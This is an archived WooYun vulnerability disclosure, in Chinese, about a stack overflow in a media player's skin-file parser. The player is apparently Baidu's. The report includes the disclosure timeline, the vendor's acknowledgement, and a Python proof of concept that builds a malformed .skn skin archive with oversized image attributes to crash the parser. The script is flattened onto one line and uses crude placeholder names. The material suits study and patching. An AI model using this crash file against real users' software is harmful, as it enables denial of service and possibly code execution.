乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-30: 细节已通知厂商并且等待厂商处理中 2013-09-01: 厂商已经确认,细节仅向厂商公开 2013-09-04: 细节向第三方安全合作伙伴开放 2013-10-26: 细节向核心白帽子及相关领域专家公开 2013-11-05: 细节向普通白帽子公开 2013-11-15: 细节向实习白帽子公开 2013-11-28: 细节向公众公开
皮肤文件处理逻辑中多处缺少长度检查存在堆栈溢出
#!/usr/bin/pythonimport sys, time, os,zipfileimagefuzzer="A"*4096imagefuzzer1="A"skinxmltmp="<skin version=\"2\" name=\"fuck\" author=\"fucker\" url=\"http://fucker.com\" email=\"[email protected]\" transparent_color=\"#ff00ff\">\ <player_window image=\"" + imagefuzzer1*512 + """ "> <play position="8, 125, 38, 155" image=" """ + imagefuzzer +"""" /> <pause position="8, 125, 38, 155" image=" """+imagefuzzer1+"""" /> <stop position="43, 130, 63, 150" image=" """+imagefuzzer1+"""" /> <prev position="70, 130, 90, 150" image="""+imagefuzzer1+"""" /> <next position="95, 130, 115, 150" image="""+imagefuzzer1+"""" /> <mute position="122, 130, 142, 150" image="""+imagefuzzer1+"""" /> <open position="130, 3, 149, 22" image="""+imagefuzzer1+"""" /> <lyric position="158, 3, 177, 22" image="lyric.bmp" /> <equalizer position="180, 3, 199, 22" image="equalizer.bmp" /> <playlist position="202, 3, 221, 22" image="playlist.bmp" /> <minimize position="229, 6, 244, 21" image="minimize.bmp" /> <exit position="245, 6, 260, 21" image="exit.bmp" /> <progress position="18, 106, 248, 117" bar_image="" thumb_image="progress_thumb.bmp" /> <volume position="151, 130, 217, 148" vertical="false" bar_image="" thumb_image="volume_thumb.bmp" fill_image="volume_fill.bmp" /> <visual position="11, 30, 147, 78" /> <icon position="8, 86, 24, 102" /> <info position="28, 88, 258, 100" color="#ffff06" bkgnd="#000000" font="SimSun" font_size="12" /> <led position="204, 32, 254, 45" image="number.bmp" align="right" /> <stereo position="210, 50, 254, 62" color="#00ffff" bkgnd="#212741" font="SimSun" font_size="12" align="right" /> <status position="181, 65, 254, 77" color="#dcdcdc" bkgnd="#212741" font="SimSun" font_size="12" align="right" /> </player_window> <lyric_window position="268, 0, 536, 165" resize_rect="14, 34, 256, 42" resize_tile="1" image="lyric_skin.bmp"> <title position="0, 8, 55, 21" image="lyric_title.bmp" align="center" /> <close position="245, 6, 260, 21" image="exit.bmp" align="right" /> <lyric position="8, 28, 260, 52" /> </lyric_window> <equalizer_window position="268, 165, 536, 330" image="equalizer_skin.bmp" eq_interval="2"> <close position="245, 6, 260, 21" image="exit.bmp" align="right" /> <enabled position="12, 33, 31, 52" image="eq_enabled.bmp" /> <profile position="34, 33, 53, 52" image="eq_profile.bmp" /> <reset position="56, 33, 75, 52" image="eq_reset.bmp" /> <balance position="111, 39, 162, 48" thumb_image="eq_balance.bmp" bar_image="" /> <surround position="203, 39, 254, 48" thumb_image="eq_balance.bmp" bar_image="" /> <preamp position="13, 74, 31, 154" thumb_image="eq_thumb.bmp" bar_image="" fill_image="eq_fill.bmp" /> <eqfactor position="59, 74, 77, 154" thumb_image="eq_thumb.bmp" bar_image="" fill_image="eq_fill.bmp" /> </equalizer_window> <playlist_window position="0, 165, 268, 330" resize_rect="14, 54, 254, 76" resize_tile="1" image="playlist_skin.bmp"> <title position="0, 8, 55, 21" image="playlist_title.bmp" align="center" /> <close position="245, 6, 260, 21" image="exit.bmp" align="right" /> <toolbar position="8, 24, 260, 44" image="playlist_toolbar.bmp" align="top+left"/> <scrollbar buttons_image="scrollbar_button.bmp" thumb_image="scrollbar_thumb.bmp" bar_image="scrollbar_bar.bmp" thumb_resize_center="8" thumb_resize_tile="1"/> <playlist position="9, 50, 259, 82"/> </playlist_window></skin>"""buff = skinxmltmpgeneratefile = open(".\\Classic\\skin.xml", 'w')generatefile.write(buff)generatefile.close()zf=zipfile.ZipFile('Z:\\Classic.skn','w',zipfile.ZIP_DEFLATED)targetdir=".\\Classic"print os.chdir(targetdir)for dp,dn,fn in os.walk("."): for f in fn: print os.path.join(dp,f) zf.write(os.path.join(dp,f)) zf.close()
检查缓冲区长度
危害等级:中
漏洞Rank:10
确认时间:2013-09-01 10:10
感谢提交,正在处理。“百度,因你更安全”。
暂无
